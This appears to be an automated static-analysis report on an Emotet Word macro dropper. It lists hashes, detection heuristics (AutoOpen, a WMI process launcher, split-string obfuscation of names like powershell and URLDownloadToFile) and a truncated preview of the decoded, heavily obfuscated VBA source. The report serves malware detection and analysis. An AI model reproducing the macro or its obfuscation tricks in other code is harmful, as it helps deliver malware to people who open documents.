Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7de845cb1aafd42e…

MALICIOUS

Office (OLE)

Size: 152.4 KB · Created: 2019-04-30 07:06:00 · Authoring application: Microsoft Office Word · First seen: 2019-05-31
MD5: 647a238bd1ea919b48b3b93272703d35
SHA-1: 490fc66bd5a183867e4033f31bd19e5d6cffaf54
SHA-256: 7de845cb1aafd42eccb29a42fb8a3bc4820d429d7dab8ecd89ee2c09c6d59657
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File

The sample contains a critical heuristic firing for VBA WMI Win32_Process launcher, indicating the macro attempts to create a process using WMI. The presence of an AutoOpen macro and obfuscated API names like 'winmgmts' further supports this. ClamAV detection as 'Doc.Dropper.Emotet-6959413-0' strongly suggests the Emotet family, which commonly uses macros to download and execute secondary payloads.

Heuristics 8

  • ClamAV: Doc.Dropper.Emotet-6959413-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emotet-6959413-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main · In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography · In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml · In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 36105 bytes
SHA-256: 868f08b8e316eb333d979b18d1194fde0f9f74c10f57ee99c7a46f33914042c3

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "UAACGAAD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AAAAQQ"
Attribute VB_Base = "0{0B512284-F430-4506-9FC2-FCBE06F503A0}{7E520107-E053-4282-9B9B-B41B090D7AD3}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "fAU41oQ"
Attribute VB_Base = "0{B949597E-A9F2-475D-9C7C-986D6019A202}{0A1B9E09-687F-43E4-937A-F49267DEF3CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "BAABAA_A"
Sub autoopen()
   If UDAAAAG = kAwcAU_ Then
ElseIf fAUoZDAA = dBAc1cUA Then
            PAwAADB = Hex(akkwAo1G + CSng(cAXACDCU / Tan(167129488 + 903275107)))
ElseIf SQAQGDcA = LCAB_AA Then
            Po_kGk = Atn(107327096) + Int(258044091)
ElseIf zUAQAQAX = KU_AxB Then
            U4AAAAUc = 909912934 + Atn(664243028)
End If
   If KwXXAQBw = QoAUZD Then
ElseIf aBC4AAAk = VZw4B_Q Then
            QB1UA1 = Hex(XXUAUkC + CSng(n4_D1kB / Tan(70089877 + 815851515)))
ElseIf mA4ABD = KX41ow_C Then
            kUAwAU = Atn(155522645) + Int(456909790)
ElseIf k_AZGA = iQBAAAA Then
            RBkBXA = 994008663 + Atn(122647363)
End If
SAD1xU
   If ScwCBA_ = w_DxAAA Then
ElseIf KUB41B = MAADGD_ Then
            UXAcAX = Hex(jxDCAG + CSng(zDAGQGG / Tan(163801526 + 948138119)))
ElseIf MQ1DoA = wQwAwC Then
            bUG_GA4G = Atn(733478620) + Int(579349806)
ElseIf lQXxGAA = iXUAAx Then
            RUAXxk_1 = 49063898 + Atn(490386888)
End If
   If mwAQAAxo = fxBAB4AB Then
ElseIf s1ADCA = lA1DoB Then
            XQAUBXkX = Hex(YxUDAQA + CSng(XQDAx4 / Tan(877846445 + 163344670)))
ElseIf akxUAAA = nGAAAB Then
            nDZZAQ = Atn(424307267) + Int(499486010)
ElseIf zADGxDU = X1AXAk Then
            Y1QGAwB = 120015408 + Atn(795266781)
End If
   If hcBDxDUQ = rU1_4AQ Then
ElseIf nwDxZx = hB41kUkX Then
            RQ1_U_UA = Hex(U1BBB4AA + CSng(DAAAAGQw / Tan(729179840 + 15538554)))
ElseIf ZAAAU1 = QDACUD1 Then
            Zo_AAA1X = Atn(32972560) + Int(708786670)
ElseIf ZUCBkQkA = bAAAUcDo Then
            B_wAUAD = 781196586 + Atn(151843644)
End If
End Sub
Function bZxwAA(B1GAoDAw)
   If qQ1BQkA = SUGBGXUo Then
ElseIf WcAQc_A = V1AGBBx Then
            UAGU4X1 = Hex(BXAAACUU + CSng(M1DAQ1GA / Tan(613672690 + 722188243)))
ElseIf iAA_Qo = kA4A4Uo Then
            pCAwDA = Atn(314052721) + Int(303530607)
ElseIf EABGGA = TAQXBAc Then
            kABAAU4A = 765273534 + Atn(381075805)
End If
   If lQowxQAw = wADAAXGB Then
ElseIf iQAA_DUA = jAAAwDA Then
            SAAAUA = Hex(R1AGAGQ + CSng(WAAAABDQ / Tan(33840446 + 722655753)))
ElseIf kQC1ZA = tAxAUD Then
            zABUQ1GX = Atn(632101263) + Int(402936384)
ElseIf zUGDAQA = UkAAAA Then
            WCUDAB = 974832332 + Atn(144534929)
End If
Set bZxwAA = CVar(B1GAoDAw)
   If zUA1Ao = j_kAAAQQ Then
ElseIf lBxACABU = MAkBxGQC Then
            hwABUDA = Hex(wGDQkCUX + CSng(zUUAAZDD / Tan(568937986 + 301147285)))
ElseIf rBxXZ4Xw = TcBDAQ Then
            Q__XCAC = Atn(901336385) + Int(323025183)
ElseIf mAoDxB = wAkxDoA Then
            mBA4DCcA = 501981629 + Atn(653549993)
End If
   If AAQAQAUB = C4cUDD Then
ElseIf b_QAco4 = ckcUBA Then
            TAUkcA1 = Hex(cADAUA + CSng(qwAB_AX / Tan(661794038 + 687471328)))
ElseIf KGwC4Ac = WQUA1ADA Then
            IUAAxU = Atn(53140914) + Int(805866431)
ElseIf KAAoBA = tAXUkA Then
            rDQQQU = 908092635 + Atn(536415111)
End If
   If XGUAcG1 = A_ocAAA Then
ElseIf iAcxAAA = hAwAkBo1 Then
            pZoZXAQQ = Hex(LkAXA_ + CSng(XxDQBAA / Tan(619926155 + 331780995)))
ElseIf CkZBAZc = oDoD
... (truncated)